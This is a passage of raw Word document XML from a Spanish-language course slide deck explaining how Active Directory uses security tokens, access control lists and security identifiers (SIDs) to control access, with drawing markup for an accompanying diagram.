    <w:p w14:paraId="456222E5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="90"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E192D1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1762"/>
        </w:tabs>
        <w:ind w:left="1762" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>AD valida el acceso a un recurso en función del token de seguridad del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA3DC8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="128"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B1040A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1763"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:right="749"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Este token de seguridad es el procedimiento para comprobar si un usuario forma parte de la lista de control de acceso (ACL) para el objeto solicitado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF4BA11" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="97"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D92EE20" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1762"/>
        </w:tabs>
        <w:ind w:left="1762" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El token de seguridad se compone de:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C61433" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2483"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Derechos del usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5201A272" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2483"/>
        </w:tabs>
        <w:spacing w:before="55"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SID de grupo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C1D8EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2483"/>
        </w:tabs>
        <w:spacing w:before="54"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Individual SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAB5941" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="146"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8C010E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1763"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="782"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El medio principal a través del cual se identifica una entidad de seguridad al intentar acceder a cualquier objeto protegible es un identificador denominado identificador de seguridad (SID), que es único para cada usuario o grupo de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C116C40" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="17735"/>
        </w:tabs>
        <w:spacing w:before="725"/>
        <w:ind w:left="8042"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137297F6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId122"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="840" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E3C8180" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="5349"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="134B0916" wp14:editId="40A83C00">
            <wp:extent cx="5380256" cy="331374"/>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23" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5380256" cy="331374"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6240C9C3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="96"/>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47232" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1112AFE2" wp14:editId="14F22973">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2301239</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>237997</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1630680" cy="276225"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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276225"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="58333634" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58"/>
                              <w:ind w:left="640"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Usuario de dominio</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1112AFE2" id="Textbox 280" o:spid="_x0000_s1152" type="#_x0000_t202" style="position:absolute;margin-left:181.2pt;margin-top:18.75pt;width:128.4pt;height:21.75pt;z-index:-1566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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="58333634" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58"/>
                        <w:ind w:left="640"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Usuario de dominio</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A893BDE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCAA16B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519F63AE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="140"/>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47744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="292CEB08" wp14:editId="3B416BF8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>9011411</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>266013</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2516505" cy="462280"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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6505" cy="462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5CF6BBE1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="784" w:hanging="389"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Objeto protegible (recursos como carpeta de red, archivo, etc.)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="292CEB08" id="Textbox 281" o:spid="_x0000_s1153" type="#_x0000_t202" style="position:absolute;margin-left:709.55pt;margin-top:20.95pt;width:198.15pt;height:36.4pt;z-index:-1566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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5CF6BBE1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="784" w:hanging="389"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Objeto protegible (recursos como carpeta de red, archivo, etc.)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABFF3EF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FDFCFA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ADEE4E8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="378"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="240042D8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="1" w:line="436" w:lineRule="exact"/>
        <w:ind w:left="5348"/>
        <w:jc w:val="center"/>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5374976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57D7EFAB" wp14:editId="12126684">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1583245</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-2054901</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9068435" cy="563372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8435" cy="5633720"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9068435" cy="5633720"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="283" name="Image 283"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId124" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="44414" y="0"/>
                            <a:ext cx="8868077" cy="5599876"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="284" name="Graphic 284"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="620458" y="1521781"/>
                            <a:ext cx="1781810" cy="3841750"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="1781810" h="3841750">
                                <a:moveTo>
                                  <a:pt x="608076" y="1459230"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="597916" y="1451610"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41224" y="2179536"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16002" y="2160270"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2243963"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76581" y="2206498"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="64592" y="2197354"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="51308" y="2187219"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="608076" y="1459230"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1781810" h="3841750">
                                <a:moveTo>
                                  <a:pt x="833628" y="2952750"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="801878" y="2952750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="801878" y="1510284"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="789178" y="1510284"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="789178" y="2952750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="757428" y="2952750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="795528" y="3028975"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="827278" y="2965450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="833628" y="2952750"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1781810" h="3841750">
                                <a:moveTo>
                                  <a:pt x="950976" y="567817"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="919226" y="567817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="919226" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="906526" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="906526" y="567817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="874776" y="567817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="912876" y="644017"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="944626" y="580517"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="950976" y="567817"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1781810" h="3841750">
                                <a:moveTo>
                                  <a:pt x="1781556" y="3757714"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1750999" y="3766464"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1104887" y="1508506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1092708" y="1512062"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1738807" y="3769944"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1708277" y="3778681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1765808" y="3841458"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1776958" y="3782161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1781556" y="3757714"/>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4762" y="3080833"/>
                            <a:ext cx="9058910" cy="2548255"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="9058910" h="2548255">
                                <a:moveTo>
                                  <a:pt x="0" y="1001268"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="917447" y="1001268"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="917447" y="710184"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="710184"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1001268"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="9058910" h="2548255">
                                <a:moveTo>
                                  <a:pt x="804672" y="1790700"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1722119" y="1790700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1722119" y="1499616"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="804672" y="1499616"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="804672" y="1790700"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="9058910" h="2548255">
                                <a:moveTo>
                                  <a:pt x="1528572" y="2548128"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2709671" y="2548128"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2709671" y="2343912"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1528572" y="2343912"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1528572" y="2548128"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="9058910" h="2548255">
                                <a:moveTo>
                                  <a:pt x="3509771" y="1267968"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6085332" y="1267968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6085332" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3509771" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3509771" y="1267968"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="9058910" h="2548255">
                                <a:moveTo>
                                  <a:pt x="6441947" y="1499616"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="9058656" y="1499616"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9058656" y="3048"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6441947" y="3048"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6441947" y="1499616"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="9525">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="286" name="Graphic 286"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4851082" y="1719012"/>
                            <a:ext cx="2576830" cy="1313815"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2576830" h="1313815">
                                <a:moveTo>
                                  <a:pt x="1044067" y="7874"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1034161" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42430" y="1250149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17526" y="1230376"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1313688"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="77216" y="1277747"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="64884" y="1267968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52336" y="1258023"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1044067" y="7874"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2576830" h="1313815">
